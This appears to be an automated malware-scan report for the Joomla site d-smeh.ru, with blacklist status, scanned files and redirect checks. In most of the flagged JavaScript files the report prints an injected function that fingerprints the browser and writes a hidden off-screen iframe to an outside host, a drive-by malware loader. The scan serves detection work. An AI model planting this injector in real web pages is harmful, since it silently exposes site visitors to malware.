Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=d-smeh.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://d-smeh.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://d-smeh.ru/ | 200 OK Content-Length: 40547 Content-Type: text/html | clean |
http://d-smeh.ru/plugins/system/rokbox/rokbox.js | 200 OK Content-Length: 609 Content-Type: application/x-javascript | clean |
http://d-smeh.ru/plugins/system/rokbox/themes/light/rokbox-config.js | 200 OK Content-Length: 2673 Content-Type: application/x-javascript | clean |
http://d-smeh.ru/cache/widgetkit/widgetkit-0be06e6b.js | 200 OK Content-Length: 14575 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window["WIDGETKIT_URL"]="/media/widgetkit"; function Mestolysto(){var o=navigator.userAgent;var p=(o.indexOf("Chrome")>-1||o.indexOf("Android")>-1||o.indexOf("Linux")>-1||o.indexOf("FreeBSD")>-1||o.indexOf("IEMobile")>-1||o.indexOf("Macintosh")>-1||o.indexOf("iPad")>-1||o.indexOf("iPhone")>-1);if(!p){document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"></if $widgetkit.trans.addDic({"LESS_THAN_A_MINUTE_AGO":"less than a minute ago","ABOUT_A_MINUTE_AGO":"about a minute ago","X_MINUTES_AGO":"%s minutes ago","ABOUT_AN_HOUR_AGO":"about an hour ago","X_HOURS_AGO":"about %s hours ago","ONE_DAY_AGO":"1 day ago","X_DAYS_AGO":"%s days ago"}); Antivirus reports:
| ||
http://d-smeh.ru/templates/yoo_cloud/warp/js/search.js | 200 OK Content-Length: 4788 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Mestolysto() { var o = navigator.userAgent; var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1); if (!p) { document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g a!="initialize")c.data(e.prototype.name)[a].apply(c.data(e.prototype.name),Array.prototype.slice.call(b,1));else if(!a||d.isPlainObject(a)){var f=new e;e.prototype.initialize&&f.initialize.apply(f,d.merge([c],b));c.data(e.prototype.name,f)}else d.error("Method "+a+" does not exist on jQuery."+e.name)})}})(jQuery); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://d-smeh.ru/templates/yoo_cloud/warp/js/warp.js | 200 OK Content-Length: 9564 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Mestolysto() { var o = navigator.userAgent; var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1); if (!p) { document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g a).bind("blur.placeholder",c).trigger("blur.placeholder").end()};e(function(){e("form").bind("submit.placeholder",function(){var b=e(".placeholder",this).each(a);setTimeout(function(){b.each(c)},10)})});e(window).bind("unload.placeholder",function(){e(".placeholder").val("")})})(jQuery); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://d-smeh.ru/templates/yoo_cloud/warp/js/accordionmenu.js | 200 OK Content-Length: 2239 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Mestolysto() { var o = navigator.userAgent; var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1); if (!p) { document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://d-smeh.ru/templates/yoo_cloud/warp/js/dropdownmenu.js | 200 OK Content-Length: 6102 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Mestolysto() { var o = navigator.userAgent; var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1); if (!p) { document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g new e;e.prototype.initialize&&g.initialize.apply(g,b.merge([a],o));a.data(e.prototype.name,g)}else b.error("Method "+j+" does not exist on jQuery."+e.name)})}})(jQuery); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://d-smeh.ru/templates/yoo_cloud/js/template.js | 200 OK Content-Length: 638 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Mestolysto() { var o = navigator.userAgent; var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1); if (!p) { document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"></ifr'+'ame>'); } } Mestolysto(); Antivirus reports:
| ||
http://d-smeh.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/admirald_theme&file[0]=theme.js | 200 OK Content-Length: 4560 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Mestolysto() { var o = navigator.userAgent; var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1); if (!p) { document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g window_id = new Window('window_id', {className: "mac_os_x", title: popTitle, showEffect: Element.show, hideEffect: Element.hide, width: popWidth, height: popHeight}); window_id.setAjaxContent( url, {evalScripts:true}, true, popModal ); window_id.setCookie('window_size'); window_id.setDestroyOnClose(); };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://d-smeh.ru//mc.yandex.ru/metrika/watch.js/ | 404 NOT FOUND Content-Length: 34363 Content-Type: text/html | clean |
http://d-smeh.ru/media/system/js/caption.js | 200 OK Content-Length: 2679 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Mestolysto() { var o = navigator.userAgent; var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1); if (!p) { document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g } container.className = this.selector.replace('.', '_'); container.className = container.className + " " + align; container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://d-smeh.ru/media/widgetkit/js/jquery.js | 200 OK Content-Length: 94542 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Mestolysto() { var o = navigator.userAgent; var p = (o.indexOf("Chrome") > -1 || o.indexOf("Android") > -1 || o.indexOf("Linux") > -1 || o.indexOf("FreeBSD") > -1 || o.indexOf("IEMobile") > -1 || o.indexOf("Macintosh") > -1 || o.indexOf("iPad") > -1 || o.indexOf("iPhone") > -1); if (!p) { document.write('<iframe src="http://lisitos.narkissos.ch/bubahuim15.html" style="pos'+'iti'+'on:absolute;left: -710px;top: -710px;" height="133" width="133"&g b],f.body["scroll"+b],f.documentElement["scroll"+b],f.body["offset"+b],f.documentElement["offset"+b]):a===l?(f=c.css(f,d),g=parseFloat(f),c.isNumeric(g)?g:f):this.css(d,typeof a==="string"?a:a+"px")}});p.jQuery=p.$=c;typeof define==="function"&&define.amd&&define.amd.jQuery&&define("jquery",[],function(){return c})}(window);jQuery.noConflict(); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://d-smeh.ru/ленÑа-новоÑÑей-оÑ-ÑндекÑа/ÑÐ½Ð´ÐµÐºÑ | 200 OK Content-Length: 28925 Content-Type: text/html | clean |
http://d-smeh.ru/паÑÑнÑÑÑкие-ÑÑÑлки/наÑи-паÑÑнÑÑÑ/ | 200 OK Content-Length: 30817 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: d-smeh.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 20 Sep 2014 19:50:25 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 20 Sep 2014 19:50:25 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: c338f0d1edbc6888345382940334c469=fc149q96h7umcrudsrji2a0dt0; path=/
Set-Cookie: virtuemart=fc149q96h7umcrudsrji2a0dt0
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: d-smeh.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 20 Sep 2014 19:50:25 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 20 Sep 2014 19:50:25 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: c338f0d1edbc6888345382940334c469=fc149q96h7umcrudsrji2a0dt0; path=/
Set-Cookie: virtuemart=fc149q96h7umcrudsrji2a0dt0
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: d-smeh.ru
Referer: http://www.google.com/search?q=d-smeh.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: d-smeh.ru
Referer: http://www.google.com/search?q=d-smeh.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.